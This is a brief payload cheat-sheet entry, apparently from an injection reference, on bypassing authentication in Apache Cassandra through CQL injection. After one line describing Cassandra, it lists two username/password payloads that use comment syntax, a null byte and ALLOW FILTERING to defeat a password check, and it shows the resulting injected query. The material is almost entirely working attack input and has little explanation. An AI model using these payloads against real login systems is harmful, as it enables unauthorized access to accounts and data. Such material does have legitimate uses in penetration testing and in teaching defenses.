Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
/* Cassandra Comment */
username: admin' ALLOW FILTERING; %00
password: ANY
username: admin'/*
password: */and pass>'
The injection would look like the following SQL query
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;